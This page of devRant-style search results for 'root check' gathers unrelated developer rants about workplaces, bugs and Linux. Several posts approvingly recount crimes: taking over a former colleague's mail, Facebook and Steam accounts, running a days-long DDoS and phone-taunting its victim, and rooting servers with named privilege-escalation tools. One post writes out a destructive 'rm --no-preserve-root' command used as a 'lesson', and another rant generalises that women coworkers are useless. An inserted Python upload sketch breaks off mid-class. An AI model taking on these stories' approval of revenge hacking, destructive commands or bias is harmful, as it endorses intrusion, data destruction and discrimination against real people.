Search - "root check"
Each month my department compiles a 4M row 150 column data table for compliance with a federal agency. Before submitting, we check it against about 400 rules.
The existing system was simply 400 queries that ran in sequence, table-scanning 4M rows each time, taking upwards of 6 hours, which is a huge bottleneck, especially if you have to make changes and rerun. Plus the output was rather one-dimensional.
I built a proper normalized database and created a sort of rules engine, running all 400 rules in one table scan. Not only does it complete in 30 minutes, but the reports generate automatically, and the results can be filtered on several dimensions to aid with root-cause analysis.
Management was pleased.
So a friend of mine asked me to check their mail server because some emails got lost. Or had a funny signature.
Mails were sent from Outlook so ok let's do this.
I go create a dummy account, and send/receive a few emails. All were coming in except one and some had a link appended. The link was randomly generated and was always some kind of referral.
Ok, let's check the mail server.
Nothing.
Let's check the mail header. Nothing.
Face -> wall
Fml I want to cry.
Now I want to search for a pattern and write a script which sends a bunch of mails on my laptop.
Fuck this : no WLAN and no LAN Ports available. Fine let's hotspot the phone and send a few fucking mails.
Guess what? Fucking cockmagic, no funny mails appear!
At that moment I went out and was like chainsmoking 5 cigarettes.
BAM!
It hit me! A feeling like a unicorn vomiting rainbows all over my face.
I go check their firewall. Shit redirected all email ports from within the network to another server.
Yay nobody got credentials because nobody knew it existed. Damn boy.
Hook on to the host machine, power down the VM, start and hack yourself a root account before shit boots. Luckily I just forgot the credentials to a test VM some time ago so I know that shit. Lesson learned: fucking learn from your mistakes, might be useful sometimes!
Ok fucker what in the world are you doing.
Do some terminal magic and see that it listens on the email ports.
Holy cockriders of the galaxy.
Turns out their former IT guy made a script which caught all mails from the server and injected all kinds of bullshit and then sent them to the real webserver. And the reason why some mails weren't received was said guy was too dumb to implement Unicode and some mails just broke his script.
That fucker even implemented an API to pull all those bullshit refs.
I know your name "Matthias" and I know where you live and what you've done... And to fuck you back for that misery I took your accounts and since you used the same fucking password for everything I took your mail, Facebook and Steam account too.
Git gut shithead! You better get a lawyer
Hey, Root? How do you test your slow query ticket, again? I didn't bother reading the giant green "Testing notes:" box on the ticket. Yeah, could you explain it while I don't bother to listen and talk over you? Thanks.
And later:
Hey Root. I'm the DBA. Could you explain exactly what you're doing in this ticket, because I can't understand it. What are these new columns? Where is the new query? What are you doing? And why? Oh, the ticket? Yeah, I didn't bother to read it. There was too much text filled with things like implementation details, query optimization findings, overall benchmarking results, the purpose of the new columns, and I just couldn't care enough to read any of that. Yeah, I also don't know how to find the query it's running now. Yep, have complete access to the console and DB and query log. Still can't figure it out.
And later:
Hey Root. We pulled your urgent fix ticket from the release. You know, the one that SysOps and Data and even execs have been demanding? The one you finished three months ago? Yep, the problem is still taking down production every week or so, but we just can't verify that your fix is good enough. Even though the changes are pretty minimal, you've said it's 8x faster, and provided benchmark findings, we just ... don't know how to get the query it's running out of the code. Or how to check the query logs to find it. So. We just don't know if it's good enough.
Also, we goofed up when deploying and the testing database is gone, so now we can't test it since there are no records. Never mind that you provided snippets to remedy exactly this scenario in the ticket description you wrote three months ago.
And later:
Hey Root: Why did you take so long on this ticket? It has sat for so long now that someone else filed a ticket for it, with investigation findings. You know it's bringing down production, and it's kind of urgent. Maybe you should have prioritized it more, or written up better notes. You really need to communicate better. This is why we can't trust you to get things out.
*twitchy smile*
I am bloody sick of being on my own.
I was the sole dev at the last few jobs I've held, with the exception of API Guy -- who didn't really help much, and who got fired / quit six months after I started. Every other job I've either been the only dev, or the only web dev. (Exception: My boss at my previous job was a Rails dev, but he has zero time to code, and was significantly less experienced so he could only rarely help anyway.)
But now I'm in a company with a bunch of other devs, and they're all ostensibly senior devs, so you'd think I should be able to ask questions, right? And get answers? that actually help? like "Hey, you built this; how does it work?" No bloody way.
So far every time I've asked someone for help, they've been incompetent. I asked about what a few flags did, and got an answer that basically said "you just gotta know. oh, and the labels aren't up to date, so don't trust what they say." I asked the head of the "product team" about a ticket that he wrote, and he changed what it meant four times within two days. I asked about another, and he said "oh, that isn't reproducible." Thanks. I asked about mailers, and got two very different, very incomplete walkthroughs from the more senior devs (9+ years on this codebase) that didn't help. I asked two people about how users and roles work, and still have no idea what kind of user (there are like twelve?) is what, what roles even exist, or how to check for permissions. `@current_user` is a thing, but idfk what it holds since that can change considerably, and there's an impersonation feature that changes how it works, too. I ask the product guy again about where to link something, and he has no idea. I ask said product guy about what this feature needs to do, and he doesn't know. I ask what the legal team needs, and I get nothing. I ask the designer where the goddamn CSS lives, and he doesn't know; he apparently just puts it wherever he feels like, even if it's a completely unrelated stylesheet. As long as it works, right?
I ask very simple and straightforward questions, and it takes them forever to get back to me saying what amounts to "idk, ask someone else."
This feels like the same crap all over again, except now there are a bunch of devs I can ask that give me basically the same answers as the sales people always did. Always "idk" or a confusing mess of an 'answer' that skips most/all of the important bits. At least these people don't [usually] contradict themselves.
So, @Root is all alone, again.
And surrounded by incompetence.
Again.
For fuck's sake.
Can't I catch a break?
!!good news
!!great news
!!linux dev lappy recommendations?
So, @Root might finally have a job! Woo!
(Pending a background check, drug test, cavity search, ...)
I'm excited, and kind of giddy. It's an open-office setup, but the devs are chill, the boss is chill (reminds me a bit of myself thus far, just... nice), pay is decent too. Drive is hell, but everything else feels kinda cushy. The parent company is super-stuffy corporate and has an HR and red tape fetish, but supposedly I won't have to interact with them at all. I start as soon as all of the background check nonsense comes through. (Don't get me started on that, please.)
One of the questions that came up, however, is what type of system I wanted to use. I requested a Linux lappy, and that's sadly a bit beyond the parent company's nontechnical IT department. They asked me for links to a few specific machines on amazon for options. (MacBook Pro or equivalent)
That's where this question comes in: Which lappys make great dev machines and also have decent linux (Debian/Mint/Ubuntu) support? The role is backend Rails development + some devops, so I don't need super-fancy graphics, though I will be attaching a 4k (hopefully IPS) display because space and pretty colors.
Recommendations welcome, as I should get back to them today!
Well, here's the OS rant I promised. Also apologies for no blog posts the past few weeks, working on one but I want to have all the information correct and time isn't my best friend right now :/
Anyways, let's talk about operating systems. They serve a purpose which is the goal which the user has.
So, as everyone says (or, loads of people), every system is good for a purpose and you can't call the mainstream systems shit because they all have their use.
Last part is true (that they all have their use) but defining a good system is up to an individual. So, a system which I'd be able to call good has at least the following 'features':
- it gives the user freedom. If someone just wants to use it for emailing and webbrowsing, fair enough. If someone wants to produce music on it, fair enough. If someone wants to rebuild the entire system to suit their needs, fair enough. If someone wants to check the source code to see what's actually running on their hardware, fair enough. It should be up to the user to decide what they want to/can do and not up to the maker of that system.
- it tries its best to keep the security/privacy of its users protected. Meaning, by default, no calling home, no integrating users within mass surveillance programs and no unnecessary data collection.
- Open. Especially in an age of mass surveillance, it's very important that one has the option to check the underlying code for vulnerabilities/backdoors. Can everyone do that, nope. But that doesn't mean that the option shouldn't be there because it's also about transparency so you don't HAVE to trust a software vendor on their blue eyes.
- stability. A system should be stable enough for home users to use. For people who like to tweak around? Also, but tweaking *can* lead to instability and crashes, that's not the system's responsibility.
Especially the security and privacy AND open parts are why I wouldn't ever voluntarily (if my job would depend on it, sure, I kinda need money to stay alive so I'll take that) use windows or macos. Sure, apple seems to care about user privacy way more than other vendors but as long as nobody can verify that through source code, no offense, I won't believe a thing they say about that because no one can technically verify it anyways.
Some people have told me that Linux is hard to use for new/(highly) a-technical people but looking at my own family and friends who adapted fast as hell and don't want to go back to windows now (and mac, for that matter), I highly doubt that. Sure, they'll have to learn something new. But that was also the case when they started to use any other system for the first time. Possibly try a different distro if one doesn't fit?
Problems - sometimes hard to solve on Linux, no doubt about that. But, at least it's open. Meaning that someone can dive in as deep as possible/necessary to solve the problem. That's something which is very difficult with closed systems.
The best example in this case for me (don't remember how I did it by the way) was when I mounted a network drive at boot on Windows and Linux (two systems using the same WebDAV drive). I changed the authentication and both systems weren't in for booting anymore. Hours of searching how to unfuck this on Windows - I ended up reinstalling it because I just couldn't find a solution.
On Linux, I found some article quite quickly telling me to remove the entry for the WebDAV thingy from fstab. Booted into a root recovery shell, chrooted to the hard drive, removed the entry in fstab and rebooted. BAM. Everything worked again.
So yeah, that's my view on this, I guess ;P
Root: Fleshes out missing data in some factories. Tests affected code and finds the change breaks some specs (but shouldn’t).
Root: Reaches out to spec author.
Root: Messages thundercunt (the ticket’s code reviewer) on slack about the specs and the reaching out. No response.
Root: Works on another ticket while blocked.
Root: Logs off.
Root: Talks with spec author chick in the morning. Decide to pair on specs later.
TC: Still no slack response.
Root: Gives update in standup. Mentions factories and broken specs. Mentions pairing with spec chick.
TC: Still no slack response.
Root: Pulled off tickets in favor of prod issue. Gets ignored by everyone else diagnosing prod issue. Investigates prod issue by herself. Discovers prod issue isn’t from bad code, but bad requirements — code works as requested. Communicates this with details. Gets ignored by people still diagnosing prod issue. Tries again. Gets ignored. Gives up. Works on non-blocked tickets instead.
TC: Still no slack response.
Hours later:
TC: Comments on PR telling me I broke specs (how did I not notice?), that I need to reach out to spec chick and work with her, and that I can’t resolve the ticket until it’s fixed and passes code review.
TC: Still no slack response. (21 hours later at this point)
TC: Logs off. Still no response (25 hours at this point)
———
Ignoring the prod issue for the moment…
I broke specs. No shit.
I need to talk with spec chick. No shit.
I can’t resolve the ticket. No shit!
Bitch, I told you all of this 21 fucking hours prior, and again 3 hours prior during standup. But no, I clearly “don’t communicate” and obviously have no bloody clue what I’m doing, either, so I need everything spelled out for me.
And no, I didn’t resolve the fucking ticket. Why the fuck would I if it still has pending changes? Do you even check? Ugh!
And what the fuck with that prod issue? I’m literally giving you the answer. fucking listen! Stupid cunts.
Why is it all of the women I work with are useless or freaking awful people? Don’t get me wrong, many of the men are, too, but I swear it’s every single one of the women. (Am I awful, too?)
Just. Ugh.
I can’t wait to leave this sewer of a company.
Oddly still a good day, though. Probably because I talked to recruiters and sent out my resume again.
Week 278: Most rage-inducing work experience — I’ve got a list saved! At least from the current circle of hell. I might post a few more under this tag later…
TicketA: Do this in locations a-e.
TicketB: Do this in locations e-h.
TicketC: Do this in locations i-k.
Root: There’s actually a-x, but okay. They’re all done.
Product: You didn’t address location e in ticket B! We can’t trust you to do your tickets right. Did you even test this?
Root: Did you check TicketA? It’s in TicketA.
Product guy: It was called out in TicketB! How did you miss it?!
Product guy: (Refuses to respond or speak to me, quite literally ever again.)
Product guy to everyone in private: Don’t trust Root. Don’t give her any tickets.
Product manager to boss: Root doesn’t complete her tickets! We can’t trust her. Don’t give her our tickets.
Product manager to TC: We can’t trust Root. Don’t give her our tickets.
TC: Nobody can trust you! Not even the execs! You need to rebuild your reputation.
Root: Asks coworker a simple question.
Root: Asks again.
Root: nudges them.
Root: Asks again.
Coworker: I’ll respond before tomorrow. (And doesn’t.)
Root: Asks again.
Root: Fine. I’ll figure it out on my own.
TC: Stop making it sound like you don’t have any support from the team!
Root: Asks four people about <feature> they all built.
Everyone: idk
Root: Okay, I’ll figure it out on my own.
TC: Stop making it sound like you don’t have any support from the team!
Root: Mentions multiple meetings to discuss ticket with <Person>.
TC: You called <Person> stupid and useless in front of the whole team! Go apologize!
Root: Tells TC something. Asks a simple question.
Root: Tells TC the same thing. Asks again.
TC: (No response for days.)
TC: Tells me the exact same thing publicly like it’s a revelation and I’m stupid for not knowing.
TC: You don’t communicate well!
Root: Asks who the end user of my ticket is.
Root: Asks Boss.
Root: Asks TC.
Root: Fine, I’ll build it for both.
Root: Asks again in PR.
TC: Derides; doesn’t answer.
Root: Asks again, clearly, with explanation.
TC: Copypastes the derision, still doesn’t answer.
Root: Asks boss.
Boss: Doesn’t answer.
Boss: You need to work on your communication skills.
Root: Mentions asking question about blocker to <Person> and not hearing back. Mentions following up later.
<Person>: Gets offended. Refuses to respond for weeks thereafter.
Root: Hey boss, there’s a ticket for a minor prod issue. Is that higher priority than my current ticket?
Root: Hey, should I switch tickets?
Root: Hey?
Root: … Okay, I’ll just keep on my current one.
Boss: You need to work on your priorities.
Everyone: (Endless circlejerking and drama and tattling)
One of our newly-joined junior sysadmins left a pre-production server SSH session open. Being the responsible senior (pun intended) to teach them the value of security of production (or near production, for that matter) systems, I typed in sudo rm --recursive --no-preserve-root --force / on the terminal session (I didn't hit the Enter / Return key) and left it there. The person took longer to return and the screen went to sleep. I went back to my desk and took a backup image of the machine just in case the unexpected happened.
On returning from wherever they had gone, the person hits enter / return to wake the system (they didn't even have a password-on-wake policy set up on the machine). The SSH session was still there, the machine accepted the command and started working. This person didn't even look at the session and just navigated away elsewhere (probably to get back to work on the script they were working on).
Five minutes pass by, I get the first monitoring alert saying the server is not responding. I hoped that this person would be responsible enough to check the monitoring alerts since they had an SSH session on the machine.
Seven minutes : other dependent services on the machine start complaining that the instance is unreachable.
I assign the monitoring alert to the person of the day. They come running to me saying that they can't reach the instance but the instance is listed on the inventory list. I ask them to show me the specific terminal that ran the rm -rf command. They get the beautiful realization of the day. They freak the hell out to the point that they ask me, "Am I fired?". I reply, "You should probably ask your manager".
Lesson learnt the hard way. I gave them a good understanding on what happened and explained the implications on what would have happened had this exact same scenario happened outside the office giving access to an outsider. I explained about why people in _our_ domain should care about security above all else.
There was a good 30+ minute downtime of the instance before I admitted that I had a backup and restored it (after the whole lecture). It wasn't critical since the environment was not user-facing and didn't have any critical data.
Since then we've been at this together - warning engineers when they leave their machines open and taking security lecture / sessions / workshops for new recruits (anyone who joins engineering).
I've found and fixed any kind of "bad bug" I can think of over my career from allowing negative financial transfers to weird platform specific behaviour, here are a few of the more interesting ones that come to mind...
#1 - Most expensive lesson learned
Almost 10 years ago (while learning to code) I wrote a loyalty card system that ended up going national. Fast forward 2 years and by some miracle the system still worked and had services running on 500+ POS servers in large retail stores uploading thousands of transactions each second - due to this increased traffic to stay ahead of any trouble we decided to add a loadbalancer to our backend.
This was simply a matter of re-assigning the IP and would cause 10-15 minutes of downtime (for the first time ever), we made the switch and everything seemed perfect. Too perfect...
After 10 minutes every phone in the office started going berserk - calls were coming in about store servers irreparably crashing all over the country taking all the tills offline and forcing them to close doors midday. It was bad and we couldn't conceive how it could possibly be us or our software to blame.
Turns out we made the local service write any web service errors to a log file upon failure for debugging purposes before retrying - a perfectly sensible thing to do if I hadn't forgotten to check the size of or clear the log file. In about 15 minutes of downtime each store's error log proceeded to grow and consume every available byte of HD space before crashing Windows.
#2 - Hardest to find
This was a true "Nessie" bug.. We had a single codebase powering a few hundred sites. Every now and then at some point the web server would spontaneously die and vomit a bunch of SQL statements and sensitive data back to the user causing huge concern but I could never remotely replicate the behaviour - until 4 years later it happened to one of our support staff and I could pull out their network & session info.
Turns out years back when the server was first set up each domain was added as an individual "Site" on IIS but shared the same root directory and hence the same session path. It would have remained unnoticed if we had not grown but as our traffic increased ever so often 2 users of different sites would end up sharing a session id causing the server to promptly implode on itself.
#3 - Most elegant fix
Same bastard IIS server as #2. Codebase was the most unsecure unstable travesty I've ever worked with - SQL injection vulns in EVERY URL, SQL statements stored in COOKIES... this thing was irreparably fucked up but had to stay online until it could be replaced. Basically every other day it got hit by bots and ended up sending bluepill spam or mining shitcoin and I would simply delete the instance and recreate it in a semi un-compromised state which was an acceptable solution for the business for uptime... until we were DDoS'ed for 5 days straight.
My hands were tied and there was no way to mitigate it except for stopping individual sites as they came under attack and starting them after it subsided... (for some reason they seemed to be targeting by domain instead of IP). After 3 days of doing this manually I was given the go ahead to use any resources necessary to make it stop and especially since it was IIS6 I had no fucking clue where to start.
So I stuck to what I knew and deployed a $5 VM running an Nginx reverse proxy with heavy caching and rate limiting linked to a custom fail2ban plugin in front of the insecure server. The attacks died instantly, the server sped up 10x and was never compromised by bots again (presumably since they got back a Linux user agent). To this day I marvel at this miracle $5 fix.
I think I nailed it.
I had an interview on Friday. Never had I ever such a good one. Everything went so smoothly I'm amazed to this moment.
It started pretty much normally. Few questions about me and my CV. Next some soft skills check and few minutes talking in English to make sure I know how to speak.
Next, two funny trick questions. I hope I'll translate them good enough.
1) You've got 6 cups in a row. Three of them, next to each other, are empty. Remaining 3 are full. You've got one movement to make them stand alternately, ie. Full, empty, etc. or Empty, full etc.
2) You've got yourself a cake. Normal, birthday cake in a shape of a cylinder. On three cuts, you have to cut it in 8 equal pieces.
Next was technical interview. The only thing I couldn't answer to was a formula to get angle between camera and two objects on the scene. Something about cos x.
They told me that I was the only recruitee to make project using Hololens SDK. Other people made the images gallery in 2D only.
Also they were VERY impressed that I managed to send them fix that changed a lot of the gallery in an hour. No one was expecting it so fast since the feature wasn't all that simple. Or so they said. Code was written so it wasn't hard to implement this change.
Now I've got to wait at least a week for their response. As you could imagine, I'm nervously checking my email each time I get any spam.
I'd like to thank @fire-phoenix and @Root that were responding to my last posts about this new work tasks and current hardships. I know it's a bit too early to celebrate but I'm just so hyped for how well everything went 😀
Biggest challenge I overcame as dev? One of many.
Avoiding a life sentence when the 'powers that be' targeted one of my libraries for the root cause of system performance issues and I didn't correct that accusation with a flame thrower.
What was the accusation? What I named the library. Yep. The *name* was causing every single problem in the system.
Panorama (very, very expensive APM system at the time) identified my library in its analysis; the calls to/from SQLServer were the bottleneck.
We had one of Panorama's engineers on-site and he asked what (not the actual name) MyLibrary was and (I'll preface I did not know of, nor was I involved in, any of the so-called 'research') a crack team of developers+managers researched the system thoroughly and found MyLibrary was used in just about every project. I wrote the .Net 1.1 MyLibrary as a mini-ORM to simplify the execution of database code (stored procs, etc) and gracefully handle+log database exceptions (auto-logged details such as the target db, stored procedure name, parameter values, etc, everything you'd need to troubleshoot database errors). This was before Dapper and the other fancy tools used by kids these days.
By the time the news got to me, there was a team cobbled together whose only focus was to remove any/every trace of MyLibrary from the code base. Using Waterfall, they calculated it would take at least a year to remove+replace MyLibrary with the equivalent ADO.Net plumbing.
In a department wide meeting:
DeptMgr: "This day forward, no one is to use MyLibrary to access the database! It's slow, unprofessionally named, and the root cause of all the database issues."
Me: "What about MyLibrary is slow? It's executing the standard ADO.Net code. Only extra bit of code is the exception handling to capture the details when the exception is logged."
DeptMgr: "We've spent the last 6 weeks with the Panorama engineer and he's identified MyLibrary as the cause. Company has spent over $100,000 on this software and we have to make fact based decisions. Look at this slide ... "
<DeptMgr shows a histogram of the stacktrace, showing MyLibrary as the slowest>
Me: "You do realize that the execution time is the database call itself, not the code. In that example, the invoice call, it's the stored procedure that's taking 5 seconds, not MyLibrary."
<at this point, DeptMgr is getting red-face mad>
AreaMgr: "Yes...yes...but if we stopped using MyLibrary, removing the unnecessary layers, will make the code run faster."
<typical head-nodders nod their heads in agreement>
Dev01: "The loading of MyLibrary takes CPU cycles away from code that supports our customers. Every CPU cycle counts."
<head-nodding continues>
Me: "I'm really confused. Maybe I'm looking at the data wrong. On the slide where you highlighted all the bottlenecks, the histogram shows the latency is the database, I mean...it's right there, in red. Am I looking at it wrong?"
<this was meeting with 20+ other devs, mgrs, a VP, the Panorama engineer>
DeptMgr: "Yes you are! I know MyLibrary is your baby. You need to check your ego at the door and face the facts. Your MyLibrary is a failed experiment and needs to be exterminated from this system!"
Fast forward 9 months, maybe 50% of the projects updated, I come across the documentation left from the Panorama. Even after the removal of MyLibrary, there was zero increase in performance. The engineer recommended DBAs start optimizing their indexes and other N+1 problems discovered. I decide to ask the developer who led the re-write.
Me: "I see that removing MyLibrary did nothing to improve performance."
Dev: "Yes, DeptMgr was pissed. He was ready to throw the Panorama engineer out a window when he said the problems were in the database all along. Didn't you say that?"
Me: "Um, so is this re-write project dead?"
Dev: "No. Removing MyLibrary introduced all kinds of bugs. All the boilerplate ADO.Net code caused a lot of unhandled exceptions, then we had to go back and write exception handling code."
Me: "What a failure. What dipshit would think writing more code leads to less bugs?"
Dev: "I know, I know. We're so far behind schedule. We had to come up with something. I ended up writing a library to make replacing MyLibrary easier. I called it KnightRider. Like the TV show. Everyone is excited to speed up their code with KnightRider. Same method names, same exception handling. All we have to do is replace MyLibrary with KnightRider and we're done."
Me: "Won't the bottlenecks then point to KnightRider?"
Dev: "Meh, not my problem. Panorama meets primarily with the DBAs and the networking team now. I doubt we ever use Panorama to look at our C# code."
Needless to say, I was (still) pissed that they had used MyLibrary as a dirty word and a scapegoat for months when they *knew* where the problems were. Pissed enough for a flamethrower? Maybe.
Yes yes yes
Let's spend countless hours writing painful spaghetti that generates a financial report, extend that spaghetti for specs, then not bother to check the amounts or status. or where it says the money went. Nope, checking non-unique names is totally good enough. We're so good at this. Ten points to the legendaries.
Let's also make the object factories not create the objects correctly, and make sure that report includes entries for orders that don't include any actual payments. Oh, their status? "Ready to send" of course! Let's send that totally valid $0.00 to nobody!
Oh, but Root. Root, root, root. You can't ADD payments to this. no no no. if you do, it'll break specs everywhere else that uses that factory! Shame on you for suggesting it.
Pssh, now you want to make a payment just for this report? Why would you do that? Our best devs have been working on this for years! What could you possibly know that they don't? No, they're perfect. Don't touch them. Just make them better, okay? No take, only throw!
Got a new eval board. It came in with a stock firmware, had its own IP and naturally its own webGUI. I wanted to check what was under the hood. So I SSH'd in to the device, and was prompted to enter the username. There weren't any specs or documentation.
*Hmm, let's try root*
User: root
Password: *Eh? Well, what the heck* admin
.
.
.
root@evalboard#
Muhahaha!!! Meet your hacker, eval board!
"Linux is more secure." Put on your tin-foil hats. As you can:
>Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].
(sauce: Phineas Phisher - http://pastebin.com/raw/cRYvK4jb)
-
//little Story of a sys admin
Wondered why a server on my Linux root couldn't build a network connection, even when it was running.
Checked iptables and saw that the port of the server was redirected to a different port.
I never added that rule to the firewall. Checked and a little script I used from someone else generated traffic for a mobile game.
OK, begin the DDoS penetration. Over 10 Gbit/s on some small servers.
Checked Facebook and some idiot posted on my site:
Stop you little shithead or I will report you to the police!!!
Checked his profile page and he had a small shitty android game with a botnet.
Choose one:
1. let him be
2. Fuck him up for good
Let's sudo with 2.
I scaled up my bandwidth to 25 Gbit/s and found out that guy's phone number.
Slowly started to eat away his bandwidth for days. 3 days later his server was unreachable.
Then I masked my VoIP address and called him:
Me: Hi, you know me?
He: No WTF! Why are you calling me.
Me: I love your game a lot, I really love it.
He: What's wrong with you? Who are you?
Me: I'm teach
He: teach?
Me: Teach me lesson
He: Are you crazy I'm hanging up!
Me: I really love your game. I even took away all your bandwidth. Now your servers are blocked, your game banned on the store.
He: WHAT, WHAT? (hearing typing)
Me: Don't fuck with the wrong guys. I taught you a lesson, call me EL PENETRATO
He: FUCK Fuck Fuck you! Who are you???!!! I'm going to report you!
Me: How?
He: I got your logs!
Me: Check it at Utrace...
He: Holy shit all around the world
Me: Lemme Smash Bitch
*hung up*
-
Right, I've been here before.
Our app requires an internet connection, and one of our clients wants to roll it out on a strictly managed network.
We told them which addresses our app communicates with and their network team opened them up for traffic. Should work, right?
Nope, doesn't work.
So I request them to use Fiddler to do some debugging of the network traffic, and lo and behold, it does work when Fiddler is active.
One important detail is that Fiddler uses its own SSL certificate to debug HTTPS communications. I've had moments where expired certificates were the cause of things not working and running Fiddler "fixes" this because of their own certificate.
So I point this out in numerous mails to their network team, every time I get a response saying "nah, that can't be it".
I keep insisting "I have had this before, please check if any installed Root CA Certificate is expired"
At this point I'm certain they have updates turned off on these machines, and their certificates must not have been updated for a long time.
At one point they come back to me. "Hey, when Fiddler is off, WireShark shows the app communicating with ICMP calls, but when it's on it shows HTTP calls instead".
...YOU'RE THE SUPPOSED NETWORK EXPERTS?! You think data can be sent via ICMP? Do you even know what ICMP is? Of course you'll see ICMP calls when the network is rejecting the packets instead of HTTP calls when everything's fine.
(ICMP is used to communicate errors)
I'm trying to keep my patience with these guys until they find exactly what's wrong because even I am somewhat grasping at straws right now. But things like this make me doubt their expertise...
-
Cracking old recovery CDs for the 9x/2000/XP era shines some light into how companies operated and when concepts came to be in that time:
Packard Bell: An EXE checks that you're running on a Packard Bell machine and reboots if it's not. How do we bypass it? Easy: just fucking delete it. The files to reinstall Windows from scratch come from...
...
C:?
Yup. Turns out Packard Bell was doing the recovery partition thing all the way back to the 9x era, maybe even further. Files aren't even on the restore disc so if your partition table got fucked (pretty common because malware and disk corruption) you were totally fucked and needed to repurchase Windows. (My dad, at the time, only charged at-cost OEM prices for a replacement retail copy. He knew it was dumb so he never sold PB machines.)
Compaq:
Computer check? Nope, remove one line from a BATCH file and it's gone.
Six archives, named "WINA.ZIP" through "WINF.ZIP" (plus one or two extras for OEM software) hold Windows. Problematic? Well... only because they never put the password anywhere so the installer can't install them. (Some interesting on-disc technician-only utils, though!)
Dell:
If not a Dell machine, lock up. Cause? CONFIG.SYS driver masquerading as OAK (the common CD driver) doing the check, then chainloading the real OAK driver. Simple fix: replace the fake driver with the real one.
Issues?
Would I mention this one if there weren't?
Disc is mounted on N:. Subdirectories work, but doing anything in them (a DIR, trying to execute something, trying to view shit in EDIT.COM) kicked you back to the disc root.
Installer couldn't find machine manifest in the MAP folder (it wanted your PC's serial before it'd let you install, to make sure you have the correct recovery disc) so it asked for 12-digit alphanumeric serial. The defined serials in the manifest were something like "02884902-01" or similar (8-2, all numbers) and it couldn't read the file so it couldn't show the right format, nor check for the right type.
Bypassing that issue, trying to do the ACTUAL install process caused nothing to happen... as all BATCHes for install think the CD should be on X:.
Welp.
Well that was fun. Now to test on-real-PC behavior, as VBOX and VMWare both don't like the special hardware shit it tries to use. (Why does a textmode GUI need GPU acceleration, COMPAQ?????)
-
Had an idea for an app. I started writing the prototype in Node since I just had a simple API in mind. Wanted to have some very basic CRUD functionality going and then hook up a nice interface to it. It has to do with logistics and analytics so I just wanted to start sketching something small, and being that I have been successful in doing an API like this in the past with Node and Mongo for a local company I said why not.
I have finished a good chunk of it. Gotta love that js productivity. But what tripped me out about it was:
Check how big the folder size is: 387mb
EXCUSE ME??!!
I tripped, there was no way in hell this shit was that heavy. I am basically using Koa (to give it a whirl instead of Express, gotta start testing Koa sometimes right?) and some joi with morgan and winston. That is it. I am using Mongo since legit it's the only one I know, even with that there really can't be that much right?
Check node_modules size.....10mb....wtf? What
Wait
Did it?
Sure as shit....forgot that I was storing the mongo data folder inside the app's root folder.
This would have been nothing if it would have taken me 30 seconds to figure it out.
I was losing my mind for 30 mins before I decided to properly verify
I need some sleep
-
Time for a REAL fucking rant.
io_uring manpages say you can set the CAP_SYS_NICE capability to allow SQPOLL to work. You can't, you still get an operation not permitted errno result.
Why? I checked, it says 5.10 mainline is required. Pretty sure I just manually downloaded and installed the debs myself. uname reports that I am at 5.10. So what gives?
Maintainer submitted a patch because they fucked up and made the *actual* capability check look for what's basically root permissions (CAP_SYS_ADMIN... c'mon...) and is now trying to rectify a glaring security shortcoming.
Patch hasn't been accepted or even addressed yet but they already updated the manpages with the estimated mainline kernel release as if it had made it into the release candidate. Manpages have made it into latest debs but the actual change has not.
Where the fuck is the Linus Torvalds that would ream the fuck out of shitty developers doing shitty things? The political correctness climate has discouraged such criticism now and the result... this. This fucking mess, where people are allowed to cut corners and get away with it because it would hurt their feelings when faced with pressure.
I'm not just guessing either. The maintainer has already said some of the "tone" of criticisms hurt his feelings. Yes, sorry, but when you claim 90% speedup over a typical epoll application using your new magical set of syscalls, and nobody can even get 1-2% speedup on a similar machine, people are going to be fucking skeptical. Then when you lower it to 60% because you originally omitted a bunch of SECURITY RELATED AND CORRECTNESS CHECKING CODE, we're going to call you the fuck out for fudging numbers.
Trying to maintain the equivalent of academic integrity within the computer science field is an exercise of insanity. You'd be fired and shunned from publishing in journals if you pulled that shit in ANY OTHER FUCKING FIELD, but because the CS scene is all about jerking each other off at every corner because the mean people keep saying mean things on Twitter and it hurts your feelings therefore we're all allowed to contribute subpar work and be protected from criticisms when others realize it's subpar.
These aren't mistakes anymore, it's clear you're just trying to farm clout at Facebook - maybe even FOR Facebook.
Fuck you. Do it right, the first time. Sick of shitty code being OK all of a sudden.
-
Has anyone installed Elasticsearch on Linux - CentOS to be specific?
Trying to work out why the fucker won't install. Setting up a proof of concept so don't want to use it currently as SaaS.
From what I can tell, it only needs Java (check) and to be run as a user other than root (check), but running ./bin/Elasticsearch hangs after a while and starts powering up 100 odd threads with no progress.
-
Dev Diary Entry #56
Dear diary, the part of the website that allows users to post their own articles - based on a robust rights system - through a rich text editor, is done! It has a revision system and everything. Now to work on a secure way for them to upload images and use these in their articles, as I don't allow links to external images on the site.
Dev Diary Entry #57
Dear diary, today I finally finished the image uploading feature for my website, and I have secured it as well as I can.
First, I check filesize and filetype client-side (for user convenience), then I check the same things serverside, and only allow images in certain formats to be uploaded.
Next, I completely disregard the original filename (and extension) of the image and generate UUIDs for them instead, and use fileinfo/mimetype to determine extension. I then recreate the image serverside, either in original dimensions or downsized if too large, and store the new image (and its thumbnail) in a non-shared, private folder outside the webpage root, inaccessible to other users, and add an image entry in my database that contains the file path, user who uploaded it, all that jazz.
I then serve the image to the users through a server-side script instead of allowing them direct access to the image. Great success. What could possibly go horribly wrong?
Dev Diary Entry #58
Dear diary, I am contemplating scrapping the idea of allowing users to upload images, text, comments or any other contents to the website, since I do not have the capacity to implement the copyright-filter that will probably soon become a requirement in the EU... :(
Wat to do, wat to do...
-
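The server-side steps of Entry #57 (content-based type check, UUID filename, private folder, serving through a script), sketched in Python as an added example that is not the diarist's code. The size limit, the format allowlist, the `ImageStore` class and every function name are assumptions; the re-encoding step is omitted because it needs an imaging library.

```python
import os
import re
import tempfile
import uuid
from pathlib import Path

MAX_BYTES = 2 * 1024 * 1024  # assumed limit; the diary does not give one

# Allowed formats, recognised by their leading magic bytes (assumed allowlist).
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ("png", "image/png"),
    b"\xff\xd8\xff": ("jpg", "image/jpeg"),
    b"GIF87a": ("gif", "image/gif"),
    b"GIF89a": ("gif", "image/gif"),
}
ID_RE = re.compile(r"[0-9a-f]{32}")  # shape of uuid4().hex


class UploadRejected(Exception):
    """Raised when an upload or a serve request fails a check."""


def sniff(data):
    """Return (extension, mime) from the content itself, never from the client."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    raise UploadRejected("content is not an allowed image format")


class ImageStore:
    """Hypothetical store: files live in a private directory outside the web
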